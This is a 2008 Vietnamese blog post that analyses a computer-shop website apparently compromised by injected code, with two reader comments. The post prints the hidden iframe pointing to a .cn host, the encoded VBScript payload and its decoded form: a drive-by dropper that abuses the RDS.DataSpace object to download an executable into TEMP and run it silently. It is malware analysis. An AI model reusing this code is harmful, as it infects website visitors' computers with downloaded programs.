
NAM GIÀ

CHÚ Ý: BLOG NAM GIÀ ĐÃ CHUYỂN SANG ĐỊA CHỈ http://namdh.wordpress.com

Một website bán máy tính của VN bị hack



Hờ, sau một hồi xem xét thì đoán chắc là 99% website này đã bị hack bởi các hacker Trung Quốc :D
Có thể kiểm chứng bằng cách mở source của trang web và nhìn vào dòng cuối cùng:

<!-- Injected hidden iframe (height=0 width=0) appended as the last line of the compromised page; the mixed-case tag and attribute spelling may be an attempt to defeat naive case-sensitive string matching -->
<IfRAME height=0 width=0 sRc="http://www.852599.cn/mp3/script.htm"></IFrAME>


Đoạn code này nhúng một trang web ẩn khác xuất phát từ Trung Quốc (height=0 và width=0 nên người dùng không thể nhìn thấy), nội dung trang này như sau:

<!-- Content served by the hidden iframe: a VBScript decoder plus an encoded payload, followed by a second hidden iframe -->
<script LANGUAGE="VBScript">
' Decoder: k is a comma-separated list of decimal character codes; returns the decoded string.
function rechange(k)
' Chr(44) is ","; split the list into its individual codes
s=Split(k,Chr( 44))
t=""
For i = 0 To UBound(s)
' eval on a plain integer literal just yields the number (it would also accept expressions)
kellav=eval(s(i))
t=t+Chr(kellav)
Next
rechange=t
End Function
' Encoded payload: one decimal code per character of the script that the page shows decoded further down.
' The literal appears line-wrapped here (the break after "69,120,10" / "1,78" splits the code 101 = "e" of "ExeName");
' this is a display artifact of the page, since a VBScript string literal cannot span lines.
t="68,105,109,32,86,103,103,121,85,86,102,111,103,78,99,118,81,105,100,84,121,72,73,71,76,119,112,119,97,110,109,68,72,75,66,97,112,105,83,65,67,88,122,69,83,99,119,76,120,107,76,104,103,84,113,73,116,120,88,120,84,68,86,83,111,76,103,98,88,103,66,80,107,89,104,70,65,100,102,77,103,108,116,103,80,89,89,87,98,121,71,78,114,69,69,84,88,97,83,113,71,121,13,10,79,110,32,69,114,114,111,114,32,82,101,115,117,109,101,32,78,101,120,116,13,10,97,86,75,101,86,61,34,104,116,116,112,58,47,47,119,119,119,46,56,53,50,53,57,57,46,99,110,47,109,112,51,47,115,101,116,117,112,49,48,55,50,46,101,120,101,34,13,10,83,101,116,32,122,79,89,32,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,111,98,106,101,99,116,34,41,13,10,122,79,89,46,83,101,116,65,116,116,114,105,98,117,116,101,32,34,99,108,97,115,115,105,100,34,44,32,34,99,108,115,105,100,58,66,68,57,54,67,53,53,54,45,54,53,65,51,45,49,49,68,48,45,57,56,51,65,45,48,48,67,48,52,70,67,50,57,69,51,54,34,13,10,79,79,66,110,80,108,61,34,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,112,34,13,10,83,101,116,32,87,107,83,32,61,32,122,79,89,46,67,114,101,97,116,101,79,98,106,101,99,116,40,79,79,66,110,80,108,44,34,34,41,13,10,87,107,83,46,79,112,101,110,32,34,71,69,84,34,44,32,97,86,75,101,86,44,32,70,97,108,115,101,13,10,87,107,83,46,83,101,110,100,13,10,69,120,101,78,97,109,101,61,34,108,72,119,110,67,77,117,117,104,85,117,82,101,115,46,99,111,109,34,13,10,86,98,115,78,97,109,101,61,34,90,113,100,104,72,117,115,109,70,67,89,117,84,90,46,118,98,115,34,13,10,83,101,116,32,70,80,73,32,61,32,122,79,89,46,99,114,101,97,116,101,111,98,106,101,99,116,40,34,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109,79,98,106,101,99,116,34,44,34,34,41,13,10,83,101,116,32,115,84,109,112,32,61,32,70,80,73,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,13,10,69,120,101,78,97,109,101,61,70,80,73,46,66,117,105,108,100,80,97,116,104,40,115,84,109,112,44,69,120,10
1,78,97,109,101,41,13,10,86,98,115,78,97,109,101,61,70,80,73,46,66,117,105,108,100,80,97,116,104,40,115,84,109,112,44,86,98,115,78,97,109,101,41,13,10,65,65,61,34,65,100,34,13,10,65,66,61,34,111,100,98,46,115,116,114,101,97,109,34,13,10,65,100,77,61,65,65,38,65,66,13,10,100,100,100,61,122,79,89,46,99,114,101,97,116,101,111,98,106,101,99,116,13,10,83,101,116,32,68,112,116,32,61,32,122,79,89,46,99,114,101,97,116,101,111,98,106,101,99,116,40,65,100,77,44,34,34,41,13,10,68,112,116,46,116,121,112,101,61,49,13,10,68,112,116,46,79,112,101,110,13,10,68,112,116,46,87,114,105,116,101,32,87,107,83,46,82,101,115,112,111,110,115,101,66,111,100,121,13,10,68,112,116,46,83,97,118,101,116,111,102,105,108,101,32,69,120,101,78,97,109,101,44,50,13,10,68,112,116,46,67,108,111,115,101,13,10,68,112,116,46,84,121,112,101,61,50,13,10,68,112,116,46,79,112,101,110,13,10,68,112,116,46,87,114,105,116,101,84,101,120,116,32,34,111,110,32,101,114,114,111,114,32,114,101,115,117,109,101,32,110,101,120,116,34,38,118,98,67,114,76,102,38,34,83,101,116,32,83,104,101,108,108,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,34,87,115,99,34,34,32,38,32,34,34,114,105,112,34,34,32,38,32,34,34,116,46,83,104,101,108,108,34,34,41,34,38,118,98,67,114,76,102,38,34,83,104,101,108,108,46,82,117,110,32,40,34,34,34,38,69,120,101,78,97,109,101,38,34,34,34,41,34,38,118,98,67,114,76,102,38,34,83,101,116,32,83,104,101,108,108,32,61,32,78,111,116,104,105,110,103,34,13,10,68,112,116,46,83,97,118,101,116,111,102,105,108,101,32,86,98,115,78,97,109,101,44,50,13,10,68,112,116,46,67,108,111,115,101,13,10,115,82,117,110,61,34,83,104,101,108,108,46,65,112,112,108,105,34,13,10,83,101,116,32,82,117,110,32,61,32,122,79,89,46,99,114,101,97,116,101,111,98,106,101,99,116,40,115,82,117,110,38,34,99,97,116,105,111,110,34,44,34,34,41,13,10,82,117,110,46,83,104,101,108,108,69,120,101,99,117,116,101,32,86,98,115,78,97,109,101,44,34,34,44,34,34,44,34,79,112,101,110,34,44,48"
' Decode the list and run the result as VBScript (the decoded script is the one the page lists below).
execute(rechange(t))
</Script>
<!-- Second hidden iframe; the content of Top1.htm is not shown on the page -->
<iframe height=0 width=0 src="http://www.852599.cn/mp3/Top1.htm"></iframe>


Sau khi giải mã xong, đoạn lệnh được mã hóa ở trên đã hiện nguyên hình:
' Analyst annotation of the decoded payload: a download-and-execute dropper.
' Indicators visible in this sample: the 852599.cn host, the RDS.DataSpace CLSID on the <object>,
' ADODB.Stream SaveToFile into TEMP, and Shell.Application.ShellExecute with a hidden window.
' Unused declaration with a random-looking name; presumably padding/obfuscation.
Dim VggyUVfogNcvQidTyHIGLwpwanmDHKBapiSACXzEScwLxkLhgTqItxXxTDVSoLgbXgBPkYhFAdfMgltgPYYWbyGNrEETXaSqGy
' Suppress runtime errors so any failing step is silently skipped.
On Error Resume Next
' URL of the executable to fetch.
aVKeV="http://www.852599.cn/mp3/setup1072.exe"
' <object> element carrying the CLSID documented as RDS.DataSpace (MS06-014); its CreateObject
' method is what the script uses below to instantiate COM objects from inside the page.
Set zOY = document.createElement("object")
zOY.SetAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
' ProgID for XMLHTTP; ProgIDs are case-insensitive, hence the odd casing.
OOBnPl="Microsoft.XMLHTTp"
Set WkS = zOY.CreateObject(OOBnPl,"")
' Synchronous GET (third argument False) of the executable.
WkS.Open "GET", aVKeV, False
WkS.Send
' Random-looking names for the dropped files; .com is an executable extension on Windows.
ExeName="lHwnCMuuhUuRes.com"
VbsName="ZqdhHusmFCYuTZ.vbs"
Set FPI = zOY.createobject("Scripting.FileSystemObject","")
' GetSpecialFolder(2) is the TEMP folder; both files are placed there.
Set sTmp = FPI.GetSpecialFolder(2)
ExeName=FPI.BuildPath(sTmp,ExeName)
VbsName=FPI.BuildPath(sTmp,VbsName)
' "Ad" & "odb.stream" -> "Adodb.stream"; split apparently so the ProgID does not appear literally.
AA="Ad"
AB="odb.stream"
AdM=AA&AB
' Assignment without Set or arguments; likely a no-op or an error swallowed by On Error Resume Next.
ddd=zOY.createobject
Set Dpt = zOY.createobject(AdM,"")
' Binary stream (type 1): write the HTTP response body to the .com file; 2 = overwrite if present.
Dpt.type=1
Dpt.Open
Dpt.Write WkS.ResponseBody
Dpt.Savetofile ExeName,2
Dpt.Close
' Text stream (type 2): write a small launcher .vbs that creates WScript.Shell
' (ProgID again split as "Wsc"&"rip"&"t.Shell") and runs the dropped executable.
Dpt.Type=2
Dpt.Open
Dpt.WriteText "on error resume next"&vbCrLf&"Set Shell = CreateObject(""Wsc"" & ""rip"" & ""t.Shell"")"&vbCrLf&"Shell.Run ("""&ExeName&""")"&vbCrLf&"Set Shell = Nothing"
Dpt.Savetofile VbsName,2
Dpt.Close
' "Shell.Appli" & "cation" -> Shell.Application; ShellExecute opens the .vbs with a hidden window (last argument 0).
sRun="Shell.Appli"
Set Run = zOY.createobject(sRun&"cation","")
Run.ShellExecute VbsName,"","","Open",0


Đoạn lệnh trên khi được thực thi sẽ tạo một đối tượng XMLHttp để lấy về file http://www.852599.cn/mp3/setup1072.exe, sau đó ghi nội dung tải về thành file lHwnCMuuhUuRes.com và tạo thêm file ZqdhHusmFCYuTZ.vbs trong thư mục TEMP (GetSpecialFolder(2)); cuối cùng nó dùng Shell.Application.ShellExecute để chạy ngầm file .vbs (tham số cửa sổ = 0), và file .vbs này lại gọi WScript.Shell để chạy file .com :D


Comments

ktstbniit 22. April 2008, 08:36

Thầy ơi, hình như website của em cũng bị như vậy, thi thoảng. Em tìm mãi, mà không thấy file nào khả nghi. Thầy có cách nào để quét toàn bộ các file trong máy của mình không ạ.

namdh 23. April 2008, 07:40

Sau khi được thông báo thì đã thấy mọi thứ được phục hồi, hi vọng ngày mai không thấy lại :D